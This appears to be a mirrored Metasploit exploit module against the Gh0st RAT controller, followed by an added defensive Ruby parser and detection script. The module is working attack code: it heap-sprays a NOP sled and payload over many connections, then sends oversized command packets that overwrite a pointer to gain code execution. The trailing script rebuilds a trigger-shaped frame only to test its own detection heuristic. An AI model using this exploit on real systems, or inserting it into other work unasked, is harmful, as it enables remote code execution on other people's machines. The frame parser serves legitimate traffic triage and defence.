Gh0st Client - Buffer Overflow (Metasploit)
Source: metasploit.com  Author: Professor  Published: 2017-09-08
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'zlib'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Gh0st Client Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Gh0st client (the
          controller, i.e. the C2 server side of Gh0st RAT) by spraying the
          heap over the heartbeat command and then sending an oversized
          command packet that overwrites a pointer with an address inside
          the sprayed region.
      },
      'Author'         => 'Professor Plum',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => '',
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets'        =>
        [
          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
        ],
      'Privileged'     => false,
      'DefaultTarget' => 0))
 
    register_options(
      [
        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
  end
 
  # Gh0st framing: MAGIC (5 bytes) | total packet length (u32 LE) |
  # uncompressed message length (u32 LE) | zlib(command byte || data).
  # 13 is the fixed header size (5 + 4 + 4), so the first length field
  # covers the whole frame and the second the inflated body.
  def make_packet(id, data)
    msg = id.chr + data
    compressed = Zlib::Deflate.deflate(msg)
    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
  end
 
  # Returns true only if +data+ is one complete, well-formed Gh0st frame:
  # magic matches, the total-length field equals the bytes received and the
  # inflated body is exactly as long as the header claims. A reply that fails
  # any of these means the controller is not a Gh0st instance, or that it
  # no longer answers sanely (which the exploit loop treats as success).
  def validate_response(data)
    if data.nil?
      print_status('Server closed connection')
      return false
    end
    if data.empty?
      print_status('No response received')
      return false
    end
    if data.size < 13
      print_status('Invalid packet')
      print_status(data)
      return false
    end
    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
    if mag.index(datastore['MAGIC']) != 0
      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
      return false
    end
    if pktlen != data.size
      print_status('Packet size mismatch')
      return false
    end
    msg = Zlib::Inflate.inflate(data[13..data.size])
    if msg.size != msglen
      print_status('Packet decompress failure')
      return false
    end
    return true
  end
 
  def check
    connect
    sock.put(make_packet(101, "\x00")) # heartbeat
    if validate_response(sock.get_once || '')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end
 
  def exploit
    print_status("Trying target #{target.name}")
    # Stage 1: heap spray. 101 separate connections each deliver a ~4 MiB
    # heartbeat (command 101) whose body is three NOPs, a sled of
    # "nop; add eax, 5" (90 83 C0 05) repeated 1 MiB times, then the payload.
    # The controller decompresses and keeps each body, filling the heap.
    print_status('Spraying heap...')
    for i in 0..100
      connect
      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
      if not validate_response(sock.get_once)
        disconnect
        return
      end
    end
 
    # Stage 2: trigger. For each candidate command id, send 1064 bytes of
    # padding, then target['Ret'] - 0xA0 (an address expected to fall inside
    # the sprayed heap) and 28 bytes of filler. A well-formed reply means the
    # handler survived, so the next id is tried; no valid reply is taken as
    # the overflow having fired, so the loop stops and waits for the session.
    for i in 103..107
      print_status("Trying command #{i}...")
      begin
        connect
        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
        sock.put(sploit)
        if validate_response(sock.get_once)
          next
        end
        sleep(0.1)
        break
      rescue EOFError
        print_status('Invalid')
      end
    end
    handler
    disconnect
  end
end
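The module above only encodes the Gh0st framing implicitly, inside make_packet and validate_response, and its validator has two gaps a defender-side tool should not inherit: a corrupt zlib stream raises Zlib::DataError straight out of validate_response, and the declared inflated length is never capped before inflating, so a hostile peer can declare gigabytes. The following Ruby script is an added example, not part of the Metasploit module or of Gh0st, that implements the same framing as a stand-alone builder and parser with those cases handled, and adds a triage heuristic for frames shaped like this exploit's traffic. All names (ghost_build, ghost_parse, ghost_parse_error, ghost_suspicious?, GhostFrameError) are this example's own; the thresholds in ghost_suspicious? are assumptions derived from the sizes the module sends (multi-megabyte heartbeats for the spray, 1064 bytes of padding before the overwritten pointer for commands 103..107), not from Gh0st's source.

```ruby
require 'zlib'

# Gh0st wire framing as used by the module above:
#   magic (5 bytes) | total packet length, u32 LE | inflated length, u32 LE | zlib(cmd_byte || data)
GHOST_HEADER_LEN = 13
GHOST_MAGIC      = 'Gh0st'.b

class GhostFrameError < StandardError; end

# Build one frame the way make_packet does, but on byte lengths, so that
# high-bit bytes in +data+ are never miscounted as multibyte characters.
def ghost_build(cmd, data, magic: GHOST_MAGIC)
  raise ArgumentError, 'magic must be 5 bytes' unless magic.bytesize == 5
  raise ArgumentError, 'cmd must fit in one byte' unless (0..255).cover?(cmd)
  msg  = [cmd].pack('C') + data.b
  body = Zlib::Deflate.deflate(msg)
  magic.b + [GHOST_HEADER_LEN + body.bytesize, msg.bytesize].pack('VV') + body
end

# Parse one frame with the same checks as validate_response plus a cap on the
# declared inflated size (assumed default: 16 MiB, comfortably above the ~4 MiB
# spray packets) and a rescue around inflate. Raises GhostFrameError on any
# framing problem; returns a Hash otherwise.
def ghost_parse(pkt, magic: GHOST_MAGIC, max_msg: 16 * 1024 * 1024)
  raise GhostFrameError, 'short header' if pkt.nil? || pkt.bytesize < GHOST_HEADER_LEN
  mag, pktlen, msglen = pkt.unpack('a5VV')
  raise GhostFrameError, "bad magic #{mag.inspect}" unless mag.b == magic.b
  raise GhostFrameError, "length field #{pktlen} != #{pkt.bytesize} bytes on the wire" unless pktlen == pkt.bytesize
  raise GhostFrameError, "declared inflated size #{msglen} exceeds cap #{max_msg}" if msglen > max_msg
  begin
    msg = Zlib::Inflate.inflate(pkt.byteslice(GHOST_HEADER_LEN..-1))
  rescue Zlib::Error => e
    raise GhostFrameError, "inflate failed: #{e.message}"
  end
  raise GhostFrameError, "inflated #{msg.bytesize} bytes, header said #{msglen}" unless msg.bytesize == msglen
  raise GhostFrameError, 'empty message (no command byte)' if msg.empty?
  { cmd: msg.getbyte(0), data: msg.byteslice(1..-1), packet_len: pktlen, msg_len: msglen }
end

# Same as ghost_parse, but returns the failure reason (or nil) instead of raising.
def ghost_parse_error(pkt, **opts)
  ghost_parse(pkt, **opts)
  nil
rescue GhostFrameError => e
  e.message
end

# Triage a parsed frame against the shapes this exploit sends. Thresholds are
# assumptions taken from the module's own payloads (3 + 4 MiB sled heartbeats
# for the spray; 1064 zero bytes before the overwritten pointer for commands
# 103..107), not from Gh0st's source; tune them against real traffic.
HEARTBEAT_CMD      = 101
OVERFLOW_CMDS      = (103..107)
HEARTBEAT_MAX_BODY = 16
COMMAND_MAX_BODY   = 1064

def ghost_suspicious?(frame)
  body = frame[:data].bytesize
  if frame[:cmd] == HEARTBEAT_CMD && body > HEARTBEAT_MAX_BODY
    "heartbeat with #{body}-byte body (heap spray?)"
  elsif OVERFLOW_CMDS.cover?(frame[:cmd]) && body > COMMAND_MAX_BODY
    "command #{frame[:cmd]} body of #{body} bytes exceeds #{COMMAND_MAX_BODY}"
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed frames: the module's check heartbeat, and a command-105 frame
  # shaped like its overflow attempt (1064 pad bytes, Ret - 0xA0, 28 filler bytes).
  check_pkt = ghost_build(101, "\x00".b)
  trigger   = ghost_build(105, ("\0" * 1064).b + [0x06001010 - 0xA0].pack('V') + 'a' * 28)
  [check_pkt, trigger].each do |pkt|
    f = ghost_parse(pkt)
    puts "cmd=#{f[:cmd]} body=#{f[:data].bytesize}B wire=#{pkt.bytesize}B -> #{ghost_suspicious?(f) || 'ok'}"
  end
  puts ghost_parse_error('Gh1st'.b + check_pkt.byteslice(5..-1))
end
```

Run it as a script to see the check heartbeat pass and the command-105 frame get flagged; feed ghost_parse the bytes of a captured controller-bound TCP payload (on the port the MAGIC option's peer listens on, 80 by default in the module) to triage real frames. Note that a frame split across TCP segments fails the length check by design, exactly as the module's validator would, so reassemble before parsing.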
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved